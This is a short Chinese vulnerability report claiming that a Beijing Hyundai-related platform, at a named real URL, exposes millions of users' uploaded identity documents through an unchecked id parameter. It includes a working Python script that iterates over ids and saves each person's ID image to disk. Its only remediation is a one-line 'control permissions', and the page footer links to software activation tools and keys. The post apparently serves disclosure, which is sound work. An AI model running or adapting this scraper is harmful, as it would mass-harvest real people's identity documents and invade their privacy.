北京现代某平台可越权遍历所有用户上传证件
mark
越权链接:
http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012
ID处可遍历
测试了ID从1400000开始一直到5431133都还有数据,几百万的证件信息。
写了个批量脚本,随机找了100个id检测下
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import urllib
import re
def getImg(id):
url = "http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s" %id
resp = urllib.urlopen(url)
imgurl = re.search(r'src = "(.*?)"', resp.read())
if imgurl.group(1) == "":
pass
else:
imgurl = "http://zhihuan.xd2sc.com/CarExapp/"+imgurl.group(1)
img = urllib.urlopen(imgurl).read()
with open(str(id)+".jpg",'wb') as fs:
fs.write(img)
if __name__ == '__main__':
for i in range(5000000,5000100):
getImg(i)
解决方案:
控制权限
相关文章
图文推荐
- 文章
- 推荐
- · 动态IP地址的捕获及其应用
- · netstat参数及其他命令
- · arp代理简介
- · TCP连接的建立和终止
- · TCP/IP协议FAQ(一)
- · XMPP协议学习笔记
- · 介绍XMPP协议相关细节
- · TCP/IP,HTTP,SOAP等协议之区别
- · win7激活工具
- · win10激活工具
- · win7激活工具旗舰版
- · office2010激活密钥
- · windows7激活密钥
- · office2010激活工具
- · 小马激活工具
- · win10激活工具
- 热门新闻
